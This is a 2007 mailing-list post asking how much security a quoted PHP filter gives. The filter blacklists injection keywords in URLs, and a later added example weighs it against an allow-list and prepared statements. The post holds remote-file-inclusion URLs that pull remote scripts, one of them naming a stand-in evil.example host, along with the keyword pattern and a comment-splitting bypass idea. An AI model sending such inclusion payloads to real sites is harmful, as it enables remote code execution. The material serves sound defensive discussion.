From: huseyin mert (huseyinin@gmail.com)
Date: Mon 27 Aug 2007 - 09:35:37 EEST
<?php
// ====================================================================
//
// Avoid URL injection code. Easy to improve the security (phishing, etc.)
// of all your site if you are calling one .php to centralize all your
// DB connections.
//
// mailto: Vicente<sysvic@gmail.com>
//
// ====================================================================
$req = $_SERVER['REQUEST_URI'];
// split the request into path and query string (the query may be absent,
// so limit explode() to two parts and default the remainder to '')
$cadena = explode("?", $req, 2);
$mi_url = $cadena[0];
$resto = isset($cadena[1]) ? $cadena[1] : '';
// here you can put your suspicious strings at will. Just be careful of
// possible coincidences with your URL's variables and parameters
$inyecc =
'/script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|AND|exe|exec|INSERT|tmp/i';
// detecting
if (preg_match($inyecc, $resto)) {
// do something, for example send an e-mail alert to the administrator
// ($HTTP_SERVER_VARS in the original is deprecated; $_SERVER holds the same data)
// note: HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are request headers the client
// can set freely, only REMOTE_ADDR comes from the TCP connection
$ip = isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : '';
$forwarded = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : '';
$remoteaddress = $_SERVER['REMOTE_ADDR'];
$message = "attack injection in $mi_url \n\nchain: $resto \n\n
from: (ip-forw-RA):- $ip - $forwarded - $remoteaddress\n\n
--------- end --------------------";
mail("youremail@email.com",
"Attack injection", $message,
"From: host@{$_SERVER['SERVER_NAME']}",
"-fwebmaster@{$_SERVER['SERVER_NAME']}");
// message and kill execution
echo 'illegal url';
die();
}
// From here you can start your DB connection
$connection = mysql_connect(); //..etc.
?>
Usage Example
* URL Attack:
http://www.mydomain.com/index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w
* Response:
"illegal url"
* E-mail sent to administrator:
attack injection in /home/mydomain/public_html/index.php
chain: /index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w
from: (ip-forw-RA): - - 85.50.130.156
-----------------------------------------------------------
original address: http://www.zend.com/code/codex.php?id=1543&single=1
I found a piece of code on Zend that I really liked; I'm waiting for your
opinions on how much security it actually provides.
The first thing that comes to my mind: could it be bypassed by writing
SE/**/LECT instead of SELECT?
_______________________________________________
Linux-programlama mailing list
Linux-programlama@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-programlama
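An added example (not part of the Zend codex entry or of the list post) in PHP, contrasting the keyword blacklist quoted above with an allow-list for the `page` parameter that the usage example attacks, plus a prepared statement for the DB side. The page names in ALLOWED_PAGES, the find_article() function and the sample query strings are constructed assumptions.

```php
<?php
// The codex blacklist, unchanged, so the two checks can be compared side by side.
const INJECTION_PATTERN =
    '/script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|AND|exe|exec|INSERT|tmp/i';

// Hypothetical set of pages this site is allowed to include via ?page=.
const ALLOWED_PAGES = ['home', 'news', 'contact', 'android-apps'];

// Blacklist check: a case-insensitive substring match over the query string.
function blacklist_flags(string $query): bool {
    return preg_match(INJECTION_PATTERN, $query) === 1;
}

// Allow-list check: only names we control are accepted, so a remote URL
// (the pattern in the usage example) can never reach include().
function resolve_page(string $query): ?string {
    parse_str($query, $params);
    $page = isset($params['page']) ? (string) $params['page'] : 'home';
    return in_array($page, ALLOWED_PAGES, true) ? $page : null;
}

// DB side: bind the value instead of scanning for SQL keywords.
// Assumes a table `articles(id, title, slug)`; $db is any configured PDO handle.
function find_article(PDO $db, string $slug): ?array {
    $stmt = $db->prepare('SELECT id, title FROM articles WHERE slug = :slug');
    $stmt->execute([':slug' => $slug]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample query strings showing where the blacklist misfires.
$samples = [
    'page=home',                          // legitimate
    'page=android-apps',                  // legitimate, but "AND" matches
    'page=contact&q=executive+summary',   // legitimate, but "exe" matches
    'page=http://evil.example/shell.txt', // the remote-include shape from the usage example
];
foreach ($samples as $q) {
    printf("%-38s blacklist:%-6s allowlist:%s\n", $q,
        blacklist_flags($q) ? 'BLOCK' : 'pass',
        resolve_page($q) ?? 'REJECT');
}
```

The two legitimate requests containing "android" and "executive" are blocked by the blacklist but pass the allow-list, while the remote URL is rejected by the allow-list regardless of how the keyword list is spelled.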